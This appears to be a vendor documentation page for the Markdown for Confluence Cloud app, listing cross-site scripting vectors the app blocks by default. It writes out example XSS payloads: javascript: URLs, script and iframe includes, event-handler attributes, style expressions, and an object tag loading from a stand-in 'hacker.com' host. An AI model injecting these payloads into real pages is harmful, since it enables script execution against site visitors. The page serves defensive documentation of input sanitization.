The Markdown for Confluence Cloud app addresses certain security issues by default. This page illustrates the issues that are prevented from occurring when using the Cloud version of the app.
Usage of <a> tag with the
'ahref
'attribute:
No Format <a href='javascript:alert("Test");'>Test 1</a> <a href='javascript:alert("Test Vulnerability through a href unicode");'>Test 2</a> (or) [javascript:alert('Test Vulnerability through a href');]Usage of
JavaScriptJavascript:
No Format <script>alert('Test Vulnerability through script');</script>Usage of script with include:
No Format <script type="text/javascript" src="https://<somesite>/include.js"></script>Usage
ifof iframe with include:
No Format <iframe src="https://bobswift.atlassian.com"></iframe>Usage of
'onXxx
'events irrespective of the tags:
No Format <div style="padding: 20px; opacity: 0;height: 20px;" onmouseout="alert('Test Vulnerbility through onXxx events')"></div> <img src="smiley.gif" alt="Smiley face" height="42" width="42" onerror="alert('No file found')">Usage of script in the src attribute:
No Format <img src="javascript:alert("XSS");"> <img dynsrc="javascript:alert('XSS')"> <img lowsrc="javascript:alert('XSS')"> <input type="image" src="javascript:alert('XSS');">Usage of script in the background attribute:
No Format <body background="javascript:alert("XSS")"> <table background="javascript:alert('XSS')"> <td background="javascript:alert('XSS')">Usage of link tag with href:
No Format <link rel="stylesheet" href="javascript:alert('XSS');">Usage of script in the style attribute:
No Format <div style="background-image: url(javascript:alert('XSS'))"> <div style="width: expression(alert('XSS'));">Usage of object with include:
No Format <object type="text/x-scriptlet" data="http://hacker.com/xss.html">